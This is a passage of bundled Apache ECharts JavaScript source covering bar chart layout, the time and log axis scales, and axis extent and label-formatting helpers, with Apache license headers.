data.mapDimension(valueAxis.dim);\n        var baseDim = data.mapDimension(baseAxis.dim);\n        var stacked = isDimensionStacked(data, valueDim /*, baseDim*/);\n        var isValueAxisH = valueAxis.isHorizontal();\n\n        var valueAxisStart = getValueAxisStart(baseAxis, valueAxis, stacked);\n\n        for (var idx = 0, len = data.count(); idx < len; idx++) {\n            var value = data.get(valueDim, idx);\n            var baseValue = data.get(baseDim, idx);\n\n            var sign = value >= 0 ? 'p' : 'n';\n            var baseCoord = valueAxisStart;\n\n            // Because of the barMinHeight, we can not use the value in\n            // stackResultDimension directly.\n            if (stacked) {\n                // Only ordinal axis can be stacked.\n                if (!lastStackCoords[stackId][baseValue]) {\n                    lastStackCoords[stackId][baseValue] = {\n                        p: valueAxisStart, // Positive stack\n                        n: valueAxisStart  // Negative stack\n                    };\n                }\n                // Should also consider #4243\n                baseCoord = lastStackCoords[stackId][baseValue][sign];\n            }\n\n            var x;\n            var y;\n            var width;\n            var height;\n\n            if (isValueAxisH) {\n                var coord = cartesian.dataToPoint([value, baseValue]);\n                x = baseCoord;\n                y = coord[1] + columnOffset;\n                width = coord[0] - valueAxisStart;\n                height = columnWidth;\n\n                if (Math.abs(width) < barMinHeight) {\n                    width = (width < 0 ? -1 : 1) * barMinHeight;\n                }\n                // Ignore stack from NaN value\n                if (!isNaN(width)) {\n                    stacked && (lastStackCoords[stackId][baseValue][sign] += width);\n                }\n            }\n            else {\n                var coord = cartesian.dataToPoint([baseValue, value]);\n                x = coord[0] + columnOffset;\n                y = baseCoord;\n                width = columnWidth;\n                height = coord[1] - valueAxisStart;\n\n                if (Math.abs(height) < barMinHeight) {\n                    // Include zero to has a positive bar\n                    height = (height <= 0 ? -1 : 1) * barMinHeight;\n                }\n                // Ignore stack from NaN value\n                if (!isNaN(height)) {\n                    stacked && (lastStackCoords[stackId][baseValue][sign] += height);\n                }\n            }\n\n            data.setItemLayout(idx, {\n                x: x,\n                y: y,\n                width: width,\n                height: height\n            });\n        }\n\n    }, this);\n}\n\n// TODO: Do not support stack in large mode yet.\nvar largeLayout = {\n\n    seriesType: 'bar',\n\n    plan: createRenderPlanner(),\n\n    reset: function (seriesModel) {\n        if (!isOnCartesian(seriesModel) || !isInLargeMode(seriesModel)) {\n            return;\n        }\n\n        var data = seriesModel.getData();\n        var cartesian = seriesModel.coordinateSystem;\n        var coordLayout = cartesian.grid.getRect();\n        var baseAxis = cartesian.getBaseAxis();\n        var valueAxis = cartesian.getOtherAxis(baseAxis);\n        var valueDim = data.mapDimension(valueAxis.dim);\n        var baseDim = data.mapDimension(baseAxis.dim);\n        var valueAxisHorizontal = valueAxis.isHorizontal();\n        var valueDimIdx = valueAxisHorizontal ? 0 : 1;\n\n        var barWidth = retrieveColumnLayout(\n            makeColumnLayout([seriesModel]), baseAxis, seriesModel\n        ).width;\n        if (!(barWidth > LARGE_BAR_MIN_WIDTH)) { // jshint ignore:line\n            barWidth = LARGE_BAR_MIN_WIDTH;\n        }\n\n        return {progress: progress};\n\n        function progress(params, data) {\n            var count = params.count;\n            var largePoints = new LargeArr(count * 2);\n            var largeBackgroundPoints = new LargeArr(count * 2);\n            var largeDataIndices = new LargeArr(count);\n            var dataIndex;\n            var coord = [];\n            var valuePair = [];\n            var pointsOffset = 0;\n            var idxOffset = 0;\n\n            while ((dataIndex = params.next()) != null) {\n                valuePair[valueDimIdx] = data.get(valueDim, dataIndex);\n                valuePair[1 - valueDimIdx] = data.get(baseDim, dataIndex);\n\n                coord = cartesian.dataToPoint(valuePair, null, coord);\n                // Data index might not be in order, depends on `progressiveChunkMode`.\n                largeBackgroundPoints[pointsOffset] = valueAxisHorizontal ? coordLayout.x + coordLayout.width : coord[0];\n                largePoints[pointsOffset++] = coord[0];\n                largeBackgroundPoints[pointsOffset] = valueAxisHorizontal ? coord[1] : coordLayout.y + coordLayout.height;\n                largePoints[pointsOffset++] = coord[1];\n                largeDataIndices[idxOffset++] = dataIndex;\n            }\n\n            data.setLayout({\n                largePoints: largePoints,\n                largeDataIndices: largeDataIndices,\n                largeBackgroundPoints: largeBackgroundPoints,\n                barWidth: barWidth,\n                valueAxisStart: getValueAxisStart(baseAxis, valueAxis, false),\n                backgroundStart: valueAxisHorizontal ? coordLayout.x : coordLayout.y,\n                valueAxisHorizontal: valueAxisHorizontal\n            });\n        }\n    }\n};\n\nfunction isOnCartesian(seriesModel) {\n    return seriesModel.coordinateSystem && seriesModel.coordinateSystem.type === 'cartesian2d';\n}\n\nfunction isInLargeMode(seriesModel) {\n    return seriesModel.pipelineContext && seriesModel.pipelineContext.large;\n}\n\n// See cases in `test/bar-start.html` and `#7412`, `#8747`.\nfunction getValueAxisStart(baseAxis, valueAxis, stacked) {\n    return valueAxis.toGlobalCoord(valueAxis.dataToCoord(valueAxis.type === 'log' ? 1 : 0));\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* The \"scaleLevels\" was originally copied from \"d3.js\" with some\n* modifications made for this project.\n* (See more details in the comment on the definition of \"scaleLevels\" below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the license of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\n\n// [About UTC and local time zone]:\n// In most cases, `number.parseDate` will treat input data string as local time\n// (except time zone is specified in time string). And `format.formateTime` returns\n// local time by default. option.useUTC is false by default. This design have\n// concidered these common case:\n// (1) Time that is persistent in server is in UTC, but it is needed to be diplayed\n// in local time by default.\n// (2) By default, the input data string (e.g., '2011-01-02') should be displayed\n// as its original time, without any time difference.\n\nvar intervalScaleProto = IntervalScale.prototype;\n\nvar mathCeil = Math.ceil;\nvar mathFloor = Math.floor;\nvar ONE_SECOND = 1000;\nvar ONE_MINUTE = ONE_SECOND * 60;\nvar ONE_HOUR = ONE_MINUTE * 60;\nvar ONE_DAY = ONE_HOUR * 24;\n\n// FIXME 公用？\nvar bisect = function (a, x, lo, hi) {\n    while (lo < hi) {\n        var mid = lo + hi >>> 1;\n        if (a[mid][1] < x) {\n            lo = mid + 1;\n        }\n        else {\n            hi = mid;\n        }\n    }\n    return lo;\n};\n\n/**\n * @alias module:echarts/coord/scale/Time\n * @constructor\n */\nvar TimeScale = IntervalScale.extend({\n    type: 'time',\n\n    /**\n     * @override\n     */\n    getLabel: function (val) {\n        var stepLvl = this._stepLvl;\n\n        var date = new Date(val);\n\n        return formatTime(stepLvl[0], date, this.getSetting('useUTC'));\n    },\n\n    /**\n     * @override\n     */\n    niceExtent: function (opt) {\n        var extent = this._extent;\n        // If extent start and end are same, expand them\n        if (extent[0] === extent[1]) {\n            // Expand extent\n            extent[0] -= ONE_DAY;\n            extent[1] += ONE_DAY;\n        }\n        // If there are no data and extent are [Infinity, -Infinity]\n        if (extent[1] === -Infinity && extent[0] === Infinity) {\n            var d = new Date();\n            extent[1] = +new Date(d.getFullYear(), d.getMonth(), d.getDate());\n            extent[0] = extent[1] - ONE_DAY;\n        }\n\n        this.niceTicks(opt.splitNumber, opt.minInterval, opt.maxInterval);\n\n        // var extent = this._extent;\n        var interval = this._interval;\n\n        if (!opt.fixMin) {\n            extent[0] = round$1(mathFloor(extent[0] / interval) * interval);\n        }\n        if (!opt.fixMax) {\n            extent[1] = round$1(mathCeil(extent[1] / interval) * interval);\n        }\n    },\n\n    /**\n     * @override\n     */\n    niceTicks: function (approxTickNum, minInterval, maxInterval) {\n        approxTickNum = approxTickNum || 10;\n\n        var extent = this._extent;\n        var span = extent[1] - extent[0];\n        var approxInterval = span / approxTickNum;\n\n        if (minInterval != null && approxInterval < minInterval) {\n            approxInterval = minInterval;\n        }\n        if (maxInterval != null && approxInterval > maxInterval) {\n            approxInterval = maxInterval;\n        }\n\n        var scaleLevelsLen = scaleLevels.length;\n        var idx = bisect(scaleLevels, approxInterval, 0, scaleLevelsLen);\n\n        var level = scaleLevels[Math.min(idx, scaleLevelsLen - 1)];\n        var interval = level[1];\n        // Same with interval scale if span is much larger than 1 year\n        if (level[0] === 'year') {\n            var yearSpan = span / interval;\n\n            // From \"Nice Numbers for Graph Labels\" of Graphic Gems\n            // var niceYearSpan = numberUtil.nice(yearSpan, false);\n            var yearStep = nice(yearSpan / approxTickNum, true);\n\n            interval *= yearStep;\n        }\n\n        var timezoneOffset = this.getSetting('useUTC')\n            ? 0 : (new Date(+extent[0] || +extent[1])).getTimezoneOffset() * 60 * 1000;\n        var niceExtent = [\n            Math.round(mathCeil((extent[0] - timezoneOffset) / interval) * interval + timezoneOffset),\n            Math.round(mathFloor((extent[1] - timezoneOffset) / interval) * interval + timezoneOffset)\n        ];\n\n        fixExtent(niceExtent, extent);\n\n        this._stepLvl = level;\n        // Interval will be used in getTicks\n        this._interval = interval;\n        this._niceExtent = niceExtent;\n    },\n\n    parse: function (val) {\n        // val might be float.\n        return +parseDate(val);\n    }\n});\n\neach$1(['contain', 'normalize'], function (methodName) {\n    TimeScale.prototype[methodName] = function (val) {\n        return intervalScaleProto[methodName].call(this, this.parse(val));\n    };\n});\n\n/**\n * This implementation was originally copied from \"d3.js\"\n * <https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js>\n * with some modifications made for this program.\n * See the license statement at the head of this file.\n */\nvar scaleLevels = [\n    // Format              interval\n    ['hh:mm:ss', ONE_SECOND],          // 1s\n    ['hh:mm:ss', ONE_SECOND * 5],      // 5s\n    ['hh:mm:ss', ONE_SECOND * 10],     // 10s\n    ['hh:mm:ss', ONE_SECOND * 15],     // 15s\n    ['hh:mm:ss', ONE_SECOND * 30],     // 30s\n    ['hh:mm\\nMM-dd', ONE_MINUTE],      // 1m\n    ['hh:mm\\nMM-dd', ONE_MINUTE * 5],  // 5m\n    ['hh:mm\\nMM-dd', ONE_MINUTE * 10], // 10m\n    ['hh:mm\\nMM-dd', ONE_MINUTE * 15], // 15m\n    ['hh:mm\\nMM-dd', ONE_MINUTE * 30], // 30m\n    ['hh:mm\\nMM-dd', ONE_HOUR],        // 1h\n    ['hh:mm\\nMM-dd', ONE_HOUR * 2],    // 2h\n    ['hh:mm\\nMM-dd', ONE_HOUR * 6],    // 6h\n    ['hh:mm\\nMM-dd', ONE_HOUR * 12],   // 12h\n    ['MM-dd\\nyyyy', ONE_DAY],          // 1d\n    ['MM-dd\\nyyyy', ONE_DAY * 2],      // 2d\n    ['MM-dd\\nyyyy', ONE_DAY * 3],      // 3d\n    ['MM-dd\\nyyyy', ONE_DAY * 4],      // 4d\n    ['MM-dd\\nyyyy', ONE_DAY * 5],      // 5d\n    ['MM-dd\\nyyyy', ONE_DAY * 6],      // 6d\n    ['week', ONE_DAY * 7],             // 7d\n    ['MM-dd\\nyyyy', ONE_DAY * 10],     // 10d\n    ['week', ONE_DAY * 14],            // 2w\n    ['week', ONE_DAY * 21],            // 3w\n    ['month', ONE_DAY * 31],           // 1M\n    ['week', ONE_DAY * 42],            // 6w\n    ['month', ONE_DAY * 62],           // 2M\n    ['week', ONE_DAY * 70],            // 10w\n    ['quarter', ONE_DAY * 95],         // 3M\n    ['month', ONE_DAY * 31 * 4],       // 4M\n    ['month', ONE_DAY * 31 * 5],       // 5M\n    ['half-year', ONE_DAY * 380 / 2],  // 6M\n    ['month', ONE_DAY * 31 * 8],       // 8M\n    ['month', ONE_DAY * 31 * 10],      // 10M\n    ['year', ONE_DAY * 380]            // 1Y\n];\n\n/**\n * @param {module:echarts/model/Model}\n * @return {module:echarts/scale/Time}\n */\nTimeScale.create = function (model) {\n    return new TimeScale({useUTC: model.ecModel.get('useUTC')});\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Log scale\n * @module echarts/scale/Log\n */\n\n// Use some method of IntervalScale\nvar scaleProto$1 = Scale.prototype;\nvar intervalScaleProto$1 = IntervalScale.prototype;\n\nvar getPrecisionSafe$1 = getPrecisionSafe;\nvar roundingErrorFix = round$1;\n\nvar mathFloor$1 = Math.floor;\nvar mathCeil$1 = Math.ceil;\nvar mathPow$1 = Math.pow;\n\nvar mathLog = Math.log;\n\nvar LogScale = Scale.extend({\n\n    type: 'log',\n\n    base: 10,\n\n    $constructor: function () {\n        Scale.apply(this, arguments);\n        this._originalScale = new IntervalScale();\n    },\n\n    /**\n     * @param {boolean} [expandToNicedExtent=false] If expand the ticks to niced extent.\n     * @return {Array.<number>}\n     */\n    getTicks: function (expandToNicedExtent) {\n        var originalScale = this._originalScale;\n        var extent = this._extent;\n        var originalExtent = originalScale.getExtent();\n\n        return map(intervalScaleProto$1.getTicks.call(this, expandToNicedExtent), function (val) {\n            var powVal = round$1(mathPow$1(this.base, val));\n\n            // Fix #4158\n            powVal = (val === extent[0] && originalScale.__fixMin)\n                ? fixRoundingError(powVal, originalExtent[0])\n                : powVal;\n            powVal = (val === extent[1] && originalScale.__fixMax)\n                ? fixRoundingError(powVal, originalExtent[1])\n                : powVal;\n\n            return powVal;\n        }, this);\n    },\n\n    /**\n     * @param {number} splitNumber\n     * @return {Array.<Array.<number>>}\n     */\n    getMinorTicks: intervalScaleProto$1.getMinorTicks,\n\n    /**\n     * @param {number} val\n     * @return {string}\n     */\n    getLabel: intervalScaleProto$1.getLabel,\n\n    /**\n     * @param  {number} val\n     * @return {number}\n     */\n    scale: function (val) {\n        val = scaleProto$1.scale.call(this, val);\n        return mathPow$1(this.base, val);\n    },\n\n    /**\n     * @param {number} start\n     * @param {number} end\n     */\n    setExtent: function (start, end) {\n        var base = this.base;\n        start = mathLog(start) / mathLog(base);\n        end = mathLog(end) / mathLog(base);\n        intervalScaleProto$1.setExtent.call(this, start, end);\n    },\n\n    /**\n     * @return {number} end\n     */\n    getExtent: function () {\n        var base = this.base;\n        var extent = scaleProto$1.getExtent.call(this);\n        extent[0] = mathPow$1(base, extent[0]);\n        extent[1] = mathPow$1(base, extent[1]);\n\n        // Fix #4158\n        var originalScale = this._originalScale;\n        var originalExtent = originalScale.getExtent();\n        originalScale.__fixMin && (extent[0] = fixRoundingError(extent[0], originalExtent[0]));\n        originalScale.__fixMax && (extent[1] = fixRoundingError(extent[1], originalExtent[1]));\n\n        return extent;\n    },\n\n    /**\n     * @param  {Array.<number>} extent\n     */\n    unionExtent: function (extent) {\n        this._originalScale.unionExtent(extent);\n\n        var base = this.base;\n        extent[0] = mathLog(extent[0]) / mathLog(base);\n        extent[1] = mathLog(extent[1]) / mathLog(base);\n        scaleProto$1.unionExtent.call(this, extent);\n    },\n\n    /**\n     * @override\n     */\n    unionExtentFromData: function (data, dim) {\n        // TODO\n        // filter value that <= 0\n        this.unionExtent(data.getApproximateExtent(dim));\n    },\n\n    /**\n     * Update interval and extent of intervals for nice ticks\n     * @param  {number} [approxTickNum = 10] Given approx tick number\n     */\n    niceTicks: function (approxTickNum) {\n        approxTickNum = approxTickNum || 10;\n        var extent = this._extent;\n        var span = extent[1] - extent[0];\n        if (span === Infinity || span <= 0) {\n            return;\n        }\n\n        var interval = quantity(span);\n        var err = approxTickNum / span * interval;\n\n        // Filter ticks to get closer to the desired count.\n        if (err <= 0.5) {\n            interval *= 10;\n        }\n\n        // Interval should be integer\n        while (!isNaN(interval) && Math.abs(interval) < 1 && Math.abs(interval) > 0) {\n            interval *= 10;\n        }\n\n        var niceExtent = [\n            round$1(mathCeil$1(extent[0] / interval) * interval),\n            round$1(mathFloor$1(extent[1] / interval) * interval)\n        ];\n\n        this._interval = interval;\n        this._niceExtent = niceExtent;\n    },\n\n    /**\n     * Nice extent.\n     * @override\n     */\n    niceExtent: function (opt) {\n        intervalScaleProto$1.niceExtent.call(this, opt);\n\n        var originalScale = this._originalScale;\n        originalScale.__fixMin = opt.fixMin;\n        originalScale.__fixMax = opt.fixMax;\n    }\n\n});\n\neach$1(['contain', 'normalize'], function (methodName) {\n    LogScale.prototype[methodName] = function (val) {\n        val = mathLog(val) / mathLog(this.base);\n        return scaleProto$1[methodName].call(this, val);\n    };\n});\n\nLogScale.create = function () {\n    return new LogScale();\n};\n\nfunction fixRoundingError(val, originalVal) {\n    return roundingErrorFix(val, getPrecisionSafe$1(originalVal));\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Get axis scale extent before niced.\n * Item of returned array can only be number (including Infinity and NaN).\n */\nfunction getScaleExtent(scale, model) {\n    var scaleType = scale.type;\n\n    var min = model.getMin();\n    var max = model.getMax();\n    var fixMin = min != null;\n    var fixMax = max != null;\n    var originalExtent = scale.getExtent();\n\n    var axisDataLen;\n    var boundaryGap;\n    var span;\n    if (scaleType === 'ordinal') {\n        axisDataLen = model.getCategories().length;\n    }\n    else {\n        boundaryGap = model.get('boundaryGap');\n        if (!isArray(boundaryGap)) {\n            boundaryGap = [boundaryGap || 0, boundaryGap || 0];\n        }\n        if (typeof boundaryGap[0] === 'boolean') {\n            if (__DEV__) {\n                console.warn('Boolean type for boundaryGap is only '\n                    + 'allowed for ordinal axis. Please use string in '\n                    + 'percentage instead, e.g., \"20%\". Currently, '\n                    + 'boundaryGap is set to be 0.');\n            }\n            boundaryGap = [0, 0];\n        }\n        boundaryGap[0] = parsePercent$1(boundaryGap[0], 1);\n        boundaryGap[1] = parsePercent$1(boundaryGap[1], 1);\n        span = (originalExtent[1] - originalExtent[0])\n            || Math.abs(originalExtent[0]);\n    }\n\n    // Notice: When min/max is not set (that is, when there are null/undefined,\n    // which is the most common case), these cases should be ensured:\n    // (1) For 'ordinal', show all axis.data.\n    // (2) For others:\n    //      + `boundaryGap` is applied (if min/max set, boundaryGap is\n    //      disabled).\n    //      + If `needCrossZero`, min/max should be zero, otherwise, min/max should\n    //      be the result that originalExtent enlarged by boundaryGap.\n    // (3) If no data, it should be ensured that `scale.setBlank` is set.\n\n    // FIXME\n    // (1) When min/max is 'dataMin' or 'dataMax', should boundaryGap be able to used?\n    // (2) When `needCrossZero` and all data is positive/negative, should it be ensured\n    // that the results processed by boundaryGap are positive/negative?\n\n    if (min == null) {\n        min = scaleType === 'ordinal'\n            ? (axisDataLen ? 0 : NaN)\n            : originalExtent[0] - boundaryGap[0] * span;\n    }\n    if (max == null) {\n        max = scaleType === 'ordinal'\n            ? (axisDataLen ? axisDataLen - 1 : NaN)\n            : originalExtent[1] + boundaryGap[1] * span;\n    }\n\n    if (min === 'dataMin') {\n        min = originalExtent[0];\n    }\n    else if (typeof min === 'function') {\n        min = min({\n            min: originalExtent[0],\n            max: originalExtent[1]\n        });\n    }\n\n    if (max === 'dataMax') {\n        max = originalExtent[1];\n    }\n    else if (typeof max === 'function') {\n        max = max({\n            min: originalExtent[0],\n            max: originalExtent[1]\n        });\n    }\n\n    (min == null || !isFinite(min)) && (min = NaN);\n    (max == null || !isFinite(max)) && (max = NaN);\n\n    scale.setBlank(\n        eqNaN(min)\n        || eqNaN(max)\n        || (scaleType === 'ordinal' && !scale.getOrdinalMeta().categories.length)\n    );\n\n    // Evaluate if axis needs cross zero\n    if (model.getNeedCrossZero()) {\n        // Axis is over zero and min is not set\n        if (min > 0 && max > 0 && !fixMin) {\n            min = 0;\n        }\n        // Axis is under zero and max is not set\n        if (min < 0 && max < 0 && !fixMax) {\n            max = 0;\n        }\n    }\n\n    // If bars are placed on a base axis of type time or interval account for axis boundary overflow and current axis\n    // is base axis\n    // FIXME\n    // (1) Consider support value axis, where below zero and axis `onZero` should be handled properly.\n    // (2) Refactor the logic with `barGrid`. Is it not need to `makeBarWidthAndOffsetInfo` twice with different extent?\n    //     Should not depend on series type `bar`?\n    // (3) Fix that might overlap when using dataZoom.\n    // (4) Consider other chart types using `barGrid`?\n    // See #6728, #4862, `test/bar-overflow-time-plot.html`\n    var ecModel = model.ecModel;\n    if (ecModel && (scaleType === 'time' /*|| scaleType === 'interval' */)) {\n        var barSeriesModels = prepareLayoutBarSeries('bar', ecModel);\n        var isBaseAxisAndHasBarSeries;\n\n        each$1(barSeriesModels, function (seriesModel) {\n            isBaseAxisAndHasBarSeries |= seriesModel.getBaseAxis() === model.axis;\n        });\n\n        if (isBaseAxisAndHasBarSeries) {\n            // Calculate placement of bars on axis\n            var barWidthAndOffset = makeColumnLayout(barSeriesModels);\n\n            // Adjust axis min and max to account for overflow\n            var adjustedScale = adjustScaleForOverflow(min, max, model, barWidthAndOffset);\n            min = adjustedScale.min;\n            max = adjustedScale.max;\n        }\n    }\n\n    return [min, max];\n}\n\nfunction adjustScaleForOverflow(min, max, model, barWidthAndOffset) {\n\n    // Get Axis Length\n    var axisExtent = model.axis.getExtent();\n    var axisLength = axisExtent[1] - axisExtent[0];\n\n    // Get bars on current base axis and calculate min and max overflow\n    var barsOnCurrentAxis = retrieveColumnLayout(barWidthAndOffset, model.axis);\n    if (barsOnCurrentAxis === undefined) {\n        return {min: min, max: max};\n    }\n\n    var minOverflow = Infinity;\n    each$1(barsOnCurrentAxis, function (item) {\n        minOverflow = Math.min(item.offset, minOverflow);\n    });\n    var maxOverflow = -Infinity;\n    each$1(barsOnCurrentAxis, function (item) {\n        maxOverflow = Math.max(item.offset + item.width, maxOverflow);\n    });\n    minOverflow = Math.abs(minOverflow);\n    maxOverflow = Math.abs(maxOverflow);\n    var totalOverFlow = minOverflow + maxOverflow;\n\n    // Calulate required buffer based on old range and overflow\n    var oldRange = max - min;\n    var oldRangePercentOfNew = (1 - (minOverflow + maxOverflow) / axisLength);\n    var overflowBuffer = ((oldRange / oldRangePercentOfNew) - oldRange);\n\n    max += overflowBuffer * (maxOverflow / totalOverFlow);\n    min -= overflowBuffer * (minOverflow / totalOverFlow);\n\n    return {min: min, max: max};\n}\n\nfunction niceScaleExtent(scale, model) {\n    var extent = getScaleExtent(scale, model);\n    var fixMin = model.getMin() != null;\n    var fixMax = model.getMax() != null;\n    var splitNumber = model.get('splitNumber');\n\n    if (scale.type === 'log') {\n        scale.base = model.get('logBase');\n    }\n\n    var scaleType = scale.type;\n    scale.setExtent(extent[0], extent[1]);\n    scale.niceExtent({\n        splitNumber: splitNumber,\n        fixMin: fixMin,\n        fixMax: fixMax,\n        minInterval: (scaleType === 'interval' || scaleType === 'time')\n            ? model.get('minInterval') : null,\n        maxInterval: (scaleType === 'interval' || scaleType === 'time')\n            ? model.get('maxInterval') : null\n    });\n\n    // If some one specified the min, max. And the default calculated interval\n    // is not good enough. He can specify the interval. It is often appeared\n    // in angle axis with angle 0 - 360. Interval calculated in interval scale is hard\n    // to be 60.\n    // FIXME\n    var interval = model.get('interval');\n    if (interval != null) {\n        scale.setInterval && scale.setInterval(interval);\n    }\n}\n\n/**\n * @param {module:echarts/model/Model} model\n * @param {string} [axisType] Default retrieve from model.type\n * @return {module:echarts/scale/*}\n */\nfunction createScaleByModel(model, axisType) {\n    axisType = axisType || model.get('type');\n    if (axisType) {\n        switch (axisType) {\n            // Buildin scale\n            case 'category':\n                return new OrdinalScale(\n                    model.getOrdinalMeta\n                        ? model.getOrdinalMeta()\n                        : model.getCategories(),\n                    [Infinity, -Infinity]\n                );\n            case 'value':\n                return new IntervalScale();\n            // Extended scale, like time and log\n            default:\n                return (Scale.getClass(axisType) || IntervalScale).create(model);\n        }\n    }\n}\n\n/**\n * Check if the axis corss 0\n */\nfunction ifAxisCrossZero(axis) {\n    var dataExtent = axis.scale.getExtent();\n    var min = dataExtent[0];\n    var max = dataExtent[1];\n    return !((min > 0 && max > 0) || (min < 0 && max < 0));\n}\n\n/**\n * @param {module:echarts/coord/Axis} axis\n * @return {Function} Label formatter function.\n *         param: {number} tickValue,\n *         param: {number} idx, the index in all ticks.\n *                         If category axis, this param is not requied.\n *         return: {string} label string.\n */\nfunction makeLabelFormatter(axis) {\n    var labelFormatter = axis.getLabelModel().get('formatter');\n    var categoryTickStart = axis.type === 'category' ? axis.scale.getExtent()[0] : null;\n\n    if (typeof labelFormatter === 'string') {\n        labelFormatter = (function (tpl) {\n            return function (val) {\n                // For category axis, get raw value; for numeric axis,\n                // get foramtted label like '1,333,444'.\n                val = axis.scale.getLabel(val);\n                return tpl.replace('{value}', val != null ? val : '');\n            };\n        })(labelFormatter);\n        // Consider empty array\n        return labelFormatter;\n    }\n    else if (typeof labelFormatter === 'function') {\n        return function (tickValue, idx) {\n            // The original intention of `idx` is \"the index of the tick in all ticks\".\n            // But the previous implementation of category axis do not consider the\n            // `axisLabel.interval`, which cause that, for example, the `interval` is\n            // `1`, then the ticks \"name5\", \"name7\", \"name9\" are displayed, where the\n            // corresponding `idx` are `0`, `2`, `4`, but not `0`, `1`, `2`. So we keep\n            // the definition here for back compatibility.\n            if (categoryTickStart != null) {\n                idx = tickValue - categoryTickStart;\n            }\n            return labelFormatter(getAxisRawValue(axis, tickValue), idx);\n        };\n    }\n    else {\n        return function (tick) {\n            return axis.scale.getLabel(tick);\n        };\n    }\n}\n\nfunction getAxisRawValue(axis, value) {\n    // In category axis with data zoom, tick is not the original\n    // index of axis.data. So tick should not be exposed to user\n    // in category axis.\n    return axis.type === 'category' ? axis.scale.getLabel(value) : value;\n}\n\n/**\n * @param {module:echarts/coord/Axis} axis\n * @return {module:zrender/core/BoundingRect} Be null/undefined if no labels.\n */\nfunction estimateLabelUnionRect(axis) {\n    var axisModel = axis.model;\n    var scale = axis.scale;\n\n    if (!axisModel.get('axisLabel.show') || scale.isBlank()) {\n        return;\n    }\n\n    var isCategory = axis.type === 'category';\n\n    var realNumberScaleTicks;\n    var tickCount;\n    var categoryScaleExtent = scale.getExtent();\n\n    // Optimize for large category data, avoid call `getTicks()`.\n    if (isCategory) {\n        tickCount = scale.count();\n    }\n    else {\n        realNumberScaleTicks = scale.getTicks();\n        tickCount = realNumberScaleTicks.length;\n    }\n\n    var axisLabelModel = axis.getLabelModel();\n    var labelFormatter = makeLabelFormatter(axis);\n\n    var rect;\n    var step = 1;\n    // Simple optimization for large amount of labels\n    if (tickCount > 40) {\n        step = Math.ceil(tickCount / 40);\n    }\n    for (var i = 0; i < tickCount; i += step) {\n        var tickValue = realNumberScaleTicks ? realNumberScaleTicks[i] : categoryScaleExtent[0] + i;\n        var label = labelFormatter(tickValue);\n        var unrotatedSingleRect = axisLabelModel.getTextRect(label);\n        var singleRect = rotateTextRect(unrotatedSingleRect, axisLabelModel.get('rotate') || 0);\n\n        rect ? rect.union(singleRect) : (rect = singleRect);\n    }\n\n    return rect;\n}\n\nfunction rotateTextRect(textRect, rotate) {\n    var rotateRadians = rotate * Math.PI / 180;\n    var boundingBox = textRect.plain();\n    var beforeWidth = boundingBox.width;\n    var beforeHeight = boundingBox.height;\n    var afterWidth = beforeWidth * Math.cos(rotateRadians) + beforeHeight * Math.sin(rotateRadians);\n    var afterHeight = beforeWidth * Math.sin(rotateRadians) + beforeHeight * Math.cos(rotateRadians);\n    var rotatedRect = new BoundingRect(boundingBox.x, boundingBox.y, afterWidth, afterHeight);\n\n    return rotatedRect;\n}\n\n/**\n * @param {module:echarts/src/model/Model} model axisLabelModel or axisTickModel\n * @return {number|String} Can be null|'auto'|number|function\n */\nfunction getOptionCategoryInterval(model) {\n    var interval = model.get('interval');\n    return interval == null ? 'auto' : interval;\n}\n\n/**\n * Set `categoryInterval` as 0 implicitly indicates that\n * show all labels reguardless of overlap.\n * @param {Object} axis axisModel.axis\n * @return {boolean}\n */\nfunction shouldShowAllLabels(axis) {\n    return axis.type === 'category'\n        && getOptionCategoryInterval(axis.getLabelModel()) === 0;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// import * as axisHelper from './axisHelper';\n\nvar axisModelCommonMixin = {\n\n    /**\n     * @param {boolean} origin\n     * @return {number|string} min value or 'dataMin' or null/undefined (means auto) or NaN\n     */\n    getMin: function (origin) 